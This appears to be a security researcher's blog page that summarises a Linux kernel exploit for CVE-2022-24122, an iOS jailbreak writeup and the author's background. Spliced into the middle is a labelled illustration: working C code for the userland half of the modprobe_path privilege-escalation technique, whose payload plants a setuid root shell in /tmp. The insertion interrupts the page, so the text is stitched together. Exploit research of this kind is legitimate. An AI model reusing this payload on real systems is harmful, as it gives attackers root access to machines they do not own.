For the first time I exploited the kernel in real life. I used the bug CVE-2022-24122, which allowed a use-after-free due to bad refcount handling.
The exploit itself requires a KASLR leak to prevent an oops during the process, as well as access to user namespaces. It is not really reliable and needs many tries :D
To get root I corrupted the SLUB freelist and wrote to modprobe_path.
The exploit code can be found on GitHub or in the following:…
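The modprobe_path step mentioned above, shown as an added illustration rather than the author's exploit: this is only the unprivileged userland half of the classic Linux technique, and it assumes the kernel-side write (the SLUB freelist corruption in the post) has already pointed modprobe_path at the payload script. The paths PAYLOAD_PATH and TRIGGER_PATH, the function names and the contents of the payload script are assumptions made for this example; the kernel bug itself is not reproduced here.

```c
// Added example, not code from the post: userland side of the modprobe_path
// technique. Assumes modprobe_path already points at PAYLOAD_PATH; nothing
// here needs privileges on its own.
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Paths are assumptions for this example; a real exploit picks its own. */
#define PAYLOAD_PATH "/tmp/modprobe_payload.sh"
#define TRIGGER_PATH "/tmp/modprobe_trigger"

/* When no binfmt handler claims an executable, the kernel's
 * search_binary_handler() calls request_module("binfmt-%04x") with the
 * unsigned short at bytes 2..3 of the file header (read in host order,
 * assumed little-endian here). Modelling that shows why the trigger file
 * only needs four bytes of garbage. Returns 0 on success, -1 on bad input. */
int binfmt_module_name(const unsigned char *hdr, size_t len, char *out, size_t outlen)
{
    if (hdr == NULL || out == NULL || len < 4 || outlen < sizeof("binfmt-ffff"))
        return -1;
    unsigned magic = (unsigned)hdr[2] | ((unsigned)hdr[3] << 8);
    snprintf(out, outlen, "binfmt-%04x", magic);
    return 0;
}

/* Write the script that the kernel will run as root once modprobe_path
 * points at it. What the payload does is the attacker's choice; this one
 * leaves a root-owned setuid copy of /bin/sh behind. Returns 0 on success. */
int write_payload(const char *path)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs("#!/bin/sh\n"
          "cp /bin/sh /tmp/rootsh\n"
          "chmod 4755 /tmp/rootsh\n", f);
    if (fclose(f) != 0)
        return -1;
    return chmod(path, 0755);
}

/* Write a file whose header matches no registered binfmt (0xff is neither
 * ELF, a script nor any other known magic), so execve() falls through to
 * request_module(). Returns 0 on success. */
int write_trigger(const char *path)
{
    const unsigned char bogus[4] = {0xff, 0xff, 0xff, 0xff};
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    if (fwrite(bogus, 1, sizeof bogus, f) != sizeof bogus) {
        fclose(f);
        return -1;
    }
    if (fclose(f) != 0)
        return -1;
    return chmod(path, 0755);
}

/* Executing the trigger fails for us with ENOEXEC, but on the way to that
 * error the kernel has already spawned whatever modprobe_path names, as
 * root. Returns 0 if the expected ENOEXEC was observed, -1 otherwise. */
int fire_trigger(const char *path)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execl(path, path, (char *)NULL);      /* execl does not retry via sh */
        _exit(errno == ENOEXEC ? 0 : 1);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

int main(void)
{
    char name[32];
    const unsigned char hdr[4] = {0xff, 0xff, 0xff, 0xff};
    if (binfmt_module_name(hdr, sizeof hdr, name, sizeof name) == 0)
        printf("kernel will request_module(\"%s\") for the trigger\n", name);
    if (write_payload(PAYLOAD_PATH) != 0 || write_trigger(TRIGGER_PATH) != 0) {
        perror("setup");
        return 1;
    }
    /* Only has an effect once the kernel write has replaced modprobe_path. */
    if (fire_trigger(TRIGGER_PATH) == 0)
        printf("trigger ran (ENOEXEC as expected); check /tmp/rootsh\n");
    return 0;
}
```

On an unmodified kernel the program just sees ENOEXEC and nothing else happens; the setuid shell only appears after the kernel-side overwrite, which is the part this example deliberately leaves out. The kernel reads the module name from the file header, so the check that matters before triggering is that the four header bytes match no handler, not the file's length or name.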
In this article, I'll present a detailed iOS jailbreak writeup and some basic tips and tricks on how to set up an environment for exploiting. The bug I am exploiting is in the iOS kernel. I hope this is a helpful reference for anyone who wants to start with iOS pwn.
Now let us begin! Short story:
A few weeks ago, I found an old iPad 3,1 at my dad's. I wanted to set it up for homeschooling for my sister, but the iOS version was so old that I was unable to download anything from the App Store.…
Note that this is only an early reference that I initially created for myself. I decided to publish it for those who want to have an overview of the fundamentals. If you spot any mistakes or if you think something should be added, please reach me on Discord (bitfriends). I used some pictures from other people because this was only a reference for me. The people who created the pictures are amazing and should feel honored :)…
I like programming and low-level stuff, do vuln research, pwn things and play CTF with r3kapig/ARESx/FMC.
When I'm not using my PC, I enjoy spending time with music, playing airsoft and working on motorcycles.…